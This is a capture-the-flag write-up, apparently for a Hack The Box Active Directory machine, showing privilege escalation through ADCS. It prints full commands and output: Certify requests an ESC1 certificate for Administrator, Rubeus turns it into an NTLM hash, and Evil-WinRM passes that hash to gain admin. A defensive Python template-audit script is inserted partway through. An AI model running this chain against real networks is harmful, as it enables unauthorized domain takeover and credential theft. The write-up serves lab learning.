[2023-03-10T13:50:57Z INFO  rusthound::json::maker] 10 users parsed!
[2023-03-10T13:50:57Z INFO  rusthound::json::maker] 61 groups parsed!
[2023-03-10T13:50:57Z INFO  rusthound::json::maker] 1 computers parsed!
[2023-03-10T13:50:57Z INFO  rusthound::json::maker] 1 ous parsed!
[2023-03-10T13:50:57Z INFO  rusthound::json::maker] 1 domains parsed!
[2023-03-10T13:50:57Z INFO  rusthound::json::maker] 2 gpos parsed!
[2023-03-10T13:50:57Z INFO  rusthound::json::maker] 21 containers parsed!

RustHound Enumeration Completed at 13:50:57 on 03/10/23! Happy Graphing!

[2023-03-10T13:50:57Z INFO  rusthound::json::maker] /tmp/htb/20230310135057_sequel-htb_rusthound.zip created!
                                                                                                                                                            
┌──(root㉿kali)-[/opt/RustHound]
└─# cd work                                                                                                                                                             
                                                                                                                                                            
┌──(root㉿kali)-[/opt/RustHound/work]
└─# ls -lta
total 152
drwxr-xr-x 2 root root   4096 Mar 10 08:50 .
-rw-r--r-- 1 root root 146882 Mar 10 08:50 20230310135057_sequel-htb_rusthound.zip
drwxr-xr-x 7 root root   4096 Mar 10 08:50 ..

Next, start neo4j and BloodHound.

┌──(root㉿kali)-[~/work]
└─# neo4j console
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
2023-03-10 13:53:01.546+0000 INFO  Starting...
2023-03-10 13:53:02.245+0000 INFO  This instance is ServerId{b14b2881} (b14b2881-32dd-490b-82f4-34250c1e77b3)
2023-03-10 13:53:03.742+0000 INFO  ======== Neo4j 4.4.16 ========
2023-03-10 13:53:05.791+0000 INFO  Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2023-03-10 13:53:05.806+0000 INFO  Setting up initial user from defaults: neo4j
2023-03-10 13:53:05.806+0000 INFO  Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2023-03-10 13:53:05.829+0000 INFO  Setting version for 'security-users' to 3
2023-03-10 13:53:05.833+0000 INFO  After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2023-03-10 13:53:05.837+0000 INFO  Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2023-03-10 13:53:06.249+0000 INFO  Bolt enabled on localhost:7687.
2023-03-10 13:53:07.394+0000 INFO  Remote interface available at http://localhost:7474/
2023-03-10 13:53:07.397+0000 INFO  id: 5A4573E0CADB3BFF4E6EE60B1C3F932B92DB34B0DC5071BB01723BD13BFC98AC
2023-03-10 13:53:07.398+0000 INFO  name: system
2023-03-10 13:53:07.398+0000 INFO  creationDate: 2023-03-10T13:53:04.517Z
2023-03-10 13:53:07.398+0000 INFO  Started.
┌──(root㉿kali)-[~/work]
└─# bloodhound
(node:131685) electron: The default of contextIsolation is deprecated and will be changing from false to true in a future release of Electron.  See https://github.com/electron/electron/issues/23506 for more information
(node:131727) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.

Load the resulting ZIP and take a look.
[Image: 9.png]
Nothing useful in there...

winPeas

Download the winPEAS bat file from the following and run it on the target host.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\winPEAS.bat

            ((,.,/((((((((((((((((((((/,  */
     ,/*,..*(((((((((((((((((((((((((((((((((,
   ,*/((((((((((((((((((/,  .*//((//**, .*((((((*
   ((((((((((((((((* *****,,,/########## .(* ,((((((
   (((((((((((/* ******************/####### .(. ((((((
   ((((((..******************/@@@@@/***/###### /((((((
   ,,..**********************@@@@@@@@@@(***,#### ../(((((
   , ,**********************#@@@@@#@@@@*********##((/ /((((
   ..(((##########*********/#@@@@@@@@@/*************,,..((((
   .(((################(/******/@@@@@#****************.. /((
   .((########################(/************************..*(
   .((#############################(/********************.,(
   .((##################################(/***************..(
   .((######################################(************..(
   .((######(,.***.,(###################(..***(/*********..(
   .((######*(#####((##################((######/(********..(
   .((##################(/**********(################(**...(
   .(((####################/*******(###################.((((
   .(((((############################################/  /((
   ..(((((#########################################(..(((((.
   ....(((((#####################################( .((((((.
   ......(((((#################################( .(((((((.
   (((((((((. ,(############################(../(((((((((.
       (((((((((/,  ,####################(/..((((((((((.
             (((((((((/,.  ,*//////*,. ./(((((((((((.
                (((((((((((((((((((((((((((/
                       by carlospolop


/!\ Advisory: WinPEAS - Windows local Privilege Escalation Awesome Script
   WinPEAS should be used for authorized penetration testing and/or educational purposes only.
   Any misuse of this software will not be the responsibility of the author or of any other collaborator.
   Use it at your own networks and/or with the network owner's permission.

[*] BASIC SYSTEM INFO
 [+] WINDOWS OS
   [i] Check for vulnerabilities for the OS version with the applied patches
   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
winPEAS.bat : Access is denied.
    + CategoryInfo          : NotSpecified: (Access is denied.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

...(omitted)

Nothing particularly useful...

Powerless

Download Powerless.bat from the following site.

Also, to get more access-permission information in the output, download AccessChk.exe from the following.

Run it.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Powerless.bat
------ System Info (Use full output in conjunction with windows-exploit-suggester.py)-------
Powerless.bat : Access is denied.
    + CategoryInfo          : NotSpecified: (Access is denied.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

----- Architecture -------
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=5507

------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) -------
Current User: Ryan.Cooper

USER INFORMATION
----------------

User Name          SID
================== ==============================================
sequel\ryan.cooper S-1-5-21-4078382237-1492182817-2568127209-1105


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
--- All users, accounts and groups ---

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Brandon.Brown            Guest
James.Roberts            krbtgt                   Nicole.Thompson
Ryan.Cooper              sql_svc                  Tom.Henn
The command completed with one or more errors.

Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.


Aliases for \\DC

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*SQLServer2005SQLBrowserUser$DC
*Storage Replica Administrators
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.

------- Administrators --------
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.

...(omitted)

Nothing much here either.

ps

Let's take a look at the running processes.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ps

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    377      31    12140      20496              2124   0 certsrv
    510      19     2312       5476               372   0 csrss
    171      13     1660       4784               492   1 csrss
    393      33    16420      23236              2644   0 dfsrs
    183      12     2408       7848              3632   0 dfssvc
    256      14     4008      13576              4344   0 dllhost
  10381    7406   130564     128364              2384   0 dns
    529      21    20784      39528              1012   1 dwm
     49       6     1648       4280              3584   1 fontdrvhost
     49       6     1500       4020              3592   0 fontdrvhost
      0       0       56          8                 0   0 Idle
    131      12     1892       5612              1804   0 ismserv
    469      26    11032      47644              4016   1 LogonUI
   2276     237    85208      72764               624   0 lsass
    442      31    38608      52144              2196   0 Microsoft.ActiveDirectory.WebServices
    225      13     2812      10252              4508   0 msdtc
      0      15      308      11744                88   0 Registry
    605      14     5856      13296               616   0 services
     53       3      524       1184               296   0 smss
    575      31    36668      49664              1832   0 sqlceip
    842      59   379172     280164              5440   0 sqlservr
    140       9     1860       7852              3200   0 sqlwriter
    188      11     1716       8228                 8   0 svchost
    121      15     3164       7400               328   0 svchost
    206      12     1716       7336               344   0 svchost
    135       7     1240       5984               712   0 svchost
     86       5      900       3888               832   0 svchost
    735      16     5388      14748               852   0 svchost
    632      19     3876      10324               892   0 svchost
    212       9     2024       7524               912   0 svchost
    233      10     1716       6992               936   0 svchost
    261      15     3596       9424              1060   0 svchost
    350      14    10384      14880              1152   0 svchost
    401      32    10408      19292              1220   0 svchost
    165       9     3140       7824              1244   0 svchost
    273      13     3624      11180              1276   0 svchost
    372      19     4676      13088              1328   0 svchost
    254      15     2948      12016              1360   0 svchost
    237      12     2616      11968              1372   0 svchost
    429       9     2708       9028              1384   0 svchost
    118       7     1196       5736              1412   0 svchost
    131       9     1340       5928              1488   0 svchost
    390      15    11388      21064              1536   0 svchost
    358      17     4848      14468              1540   0 svchost
    326      10     2480       8588              1548   0 svchost
    316      13     2048       9024              1576   0 svchost
    189      12     1868       8200              1704   0 svchost
    140       9     1560       6896              1748   0 svchost
    223      12     2172       9324              1824   0 svchost
    170       9     2112       7396              1836   0 svchost
    178       9     1740       8360              2028   0 svchost
    465      19     3300      12412              2092   0 svchost
    236      25     3252      12612              2108   0 svchost
    112       7     1140       5524              2192   0 svchost
    189      15     6004      10188              2268   0 svchost
    126       7     1252       5780              2404   0 svchost
    365      18     7272      24516              2408   0 svchost
    240      13     2968      12708              2532   0 svchost
    164      10     2000       7584              2540   0 svchost
    414      20    19212      32184              2620   0 svchost
    311      20    10068      15448              2836   0 svchost
    173      11     2324      13092              2888   0 svchost
    209      11     2276       8712              3004   0 svchost
    220      12     2052       7656              3108   0 svchost
    138       8     1588       6364              3140   0 svchost
    167      10     2112      13036              3212   0 svchost
    281      20     4144      12996              3492   0 svchost
    135       9     1552       6660              3616   0 svchost
    407      26     3524      13128              3892   0 svchost
    124       7     1652       6336              4768   0 svchost
    155       9     1876       6828              5332   0 svchost
    229      12     2696      12396              5784   0 svchost
    312      16    15664      17360              5904   0 svchost
   1554       0      188        136                 4   0 System
    213      16     2348      10552              4200   0 vds
    174      11     3236      11968              3156   0 VGAuthService
    137       9     1728       7484              2168   1 vm3dservice
    148       8     1716       7264              3164   0 vm3dservice
    141      10     1808       7684              3680   1 vm3dservice
    401      23    10536      23168              3180   0 vmtoolsd
    173      11     1388       6888               480   0 wininit
    244      12     2540      17080               548   1 winlogon
    356      16    18376      28292              2932   0 WmiPrvSE
    568      26    46588      62536       0.64   1632   0 wsmprovhost
    525      25    50148      68204       0.63   4716   0 wsmprovhost

A certsrv process is running, which means Active Directory Certificate Services (ADCS) is active on this host.
Let's investigate it.

Active Directory Certificate Services - ADCS

Certify

Download the precompiled GhostPack hacking tools from the link below.

Of those, we use Certify.exe.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload Certify.exe
Info: Uploading Certify.exe to C:\Users\Ryan.Cooper\Documents\Certify.exe

                                                             
Data: 232104 bytes of 232104 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> dir


    Directory: C:\Users\Ryan.Cooper\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/10/2023   2:22 PM         174080 Certify.exe

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Certify.exe find /vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htb\sequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag           : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
        WriteOwner Principals       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519



Certify completed in 00:00:10.2107818
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> 

A vulnerable certificate template is listed.
Let's check the key entries in this output one by one.

msPKI-Certificate-Name-Flag           : ENROLLEE_SUPPLIES_SUBJECT

This flag means the enrollee supplies the subject: when requesting a certificate, the requester can specify a different user, including the DC, as the identity in the request.

pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email

Note the Client Authentication EKU: certificates issued from this template can be used to authenticate as a client (a user) within AD.

    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519

Note sequel\Domain Users: every authenticated user in AD can request a certificate from this template.

The points above are summarized clearly on the site below.

We now request a certificate using this vulnerable template.
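
As an added example (not part of the original writeup or of Certify), here is a small defender-side audit in Python that applies the conditions walked through above to Certify-style output: the requester supplies the subject, an EKU that permits client authentication, no approval or signature requirement, and enrollment open to a broad group. The input is a constructed sample that copies the UserAuthentication template from the page next to a hardened variant that I added for contrast; treating Smart Card Logon and Any Purpose as authentication EKUs, and PEND_ALL_REQUESTS (manager approval) as a blocking control, comes from the general ESC1 definition rather than from this page.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the layout Certify prints. The first template copies the page's
# UserAuthentication attributes; the second is a hardened variant added for contrast only.
SAMPLE_OUTPUT = """\
    CA Name                               : dc.sequel.htb\\sequel-DC-CA
    Template Name                         : UserAuthentication
    msPKI-Certificate-Name-Flag           : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519

    CA Name                               : dc.sequel.htb\\sequel-DC-CA
    Template Name                         : UserAuthentication-Hardened
    msPKI-Certificate-Name-Flag           : SUBJECT_ALT_REQUIRE_UPN
    mspki-enrollment-flag                 : PEND_ALL_REQUESTS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
"""

# EKUs that make an issued certificate usable for Kerberos PKINIT logon.
AUTH_EKUS = {"Client Authentication", "Smart Card Logon", "Any Purpose"}
# Enrollment principals that effectively mean "every account in the domain".
BROAD_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

KV_RE = re.compile(r"^\s*([A-Za-z][\w\- ]*?)\s*:\s*(.*)$")   # "  key   : value"
PRINCIPAL_RE = re.compile(r"^\s*(\S.*?)\s+S-1-")              # "DOMAIN\Group   S-1-5-..."


@dataclass
class Template:
    attrs: dict = field(default_factory=dict)      # key/value lines of one template block
    enrollers: list = field(default_factory=list)  # group names listed under Enrollment Rights


def parse_templates(text):
    """Split the listing into blank-line separated blocks and read each block's fields."""
    templates = []
    for block in re.split(r"\n\s*\n", text.strip("\n")):
        tpl, current = Template(), None
        for line in block.splitlines():
            m = KV_RE.match(line)
            if m:
                current, value = m.group(1), m.group(2).strip()
                tpl.attrs[current] = value
                line = value                  # the first principal sits on the key line itself
            if current == "Enrollment Rights":
                p = PRINCIPAL_RE.match(line)  # continuation lines carry one principal + SID
                if p:
                    tpl.enrollers.append(p.group(1).split("\\")[-1])  # drop "sequel\"
        if "Template Name" in tpl.attrs:
            templates.append(tpl)
    return templates


def esc1_findings(tpl):
    """Return which of the four ESC1 conditions the template meets; all four = vulnerable."""
    a, reasons = tpl.attrs, []
    if "ENROLLEE_SUPPLIES_SUBJECT" in a.get("msPKI-Certificate-Name-Flag", ""):
        reasons.append("requester chooses the subject / SAN")
    ekus = {e.strip() for e in a.get("pkiextendedkeyusage", "").split(",")}
    if ekus & AUTH_EKUS:
        reasons.append("EKU allows client authentication (PKINIT)")
    if (a.get("Authorized Signatures Required", "0") == "0"
            and "PEND_ALL_REQUESTS" not in a.get("mspki-enrollment-flag", "")):
        reasons.append("no manager approval or authorized signature required")
    broad = sorted(set(tpl.enrollers) & BROAD_PRINCIPALS)
    if broad:
        reasons.append("broad enrollment rights: " + ", ".join(broad))
    return reasons


def audit(text):
    """Map each template name to the ESC1 conditions it meets."""
    return {t.attrs["Template Name"]: esc1_findings(t) for t in parse_templates(text)}


if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_OUTPUT).items():
        print(f"{name}: {'ESC1' if len(reasons) == 4 else 'ok'} {reasons}")
```

A template flagged on all four conditions is remediated by removing any one of them, as the hardened sample shows: clear ENROLLEE_SUPPLIES_SUBJECT, require manager approval or an authorized signature, or take the broad group out of the enrollment ACL.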

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template                : UserAuthentication
[*] Subject                 : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName                 : Administrator

[*] Certificate Authority   : dc.sequel.htb\sequel-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 10

[*] cert.pem         :



[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:13.6123579
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> 

/altname:Administrator requests a certificate carrying Administrator as the alternative name.

Save the above output in the Kali environment as two files, cert.pem (the certificate) and private.key (the private key).

cert.pem
private.key

Build a PFX certificate from these two files. Any export password will do; set it to something like pass.

┌──(root㉿kali)-[~/work]
└─# openssl pkcs12 -in cert.pem -inkey private.key -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:

This certificate file is then used for Kerberos authentication. From here on, it's Rubeus's turn.

Rubeus

Get Rubeus.exe from the same GitHub repository where Certify.exe came from.
Upload it together with the certificate file to the target machine.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload cert.pfx
Info: Uploading cert.pfx to C:\Users\Ryan.Cooper\Documents\cert.pfx

                                                             
Data: 4564 bytes of 4564 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload Rubeus.exe
Info: Uploading Rubeus.exe to C:\Users\Ryan.Cooper\Documents\Rubeus.exe

                                                             
Data: 595968 bytes of 595968 bytes copied

Info: Upload successful!

We authenticate to Kerberos with the certificate to obtain a TGT; since the /getcredentials option also retrieves the account's NTLM hash, we use that option.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials /password:pass

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::5525:aaef:a1de:e889%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):


  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  Administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  3/10/2023 2:41:28 PM
  EndTime                  :  3/11/2023 12:41:28 AM
  RenewTill                :  3/17/2023 3:41:28 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  Wf9EVe7qOzVwS437MezNWw==
  ASREP (key)              :  2F742C96C3B9FBDD084FF2EE74D5E645

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : A52F78E4C751E5F5E17E1E9F3E58F4EE

Now that we know the NTLM hash, we use it for a pass-the-hash (PTH) attack.

┌──(root㉿kali)-[~/work]
└─# evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

Yes!! Administrator privileges obtained!!

Summary

This completed the privilege escalation and gave us Administrator rights.
The road to reaching ADCS was long, and investigating ADCS itself was difficult, so it was a good learning experience.
I also need to think about what to do when Powerless and winPEAS find nothing.

As always, I hope this is of some help to fellow security engineers.
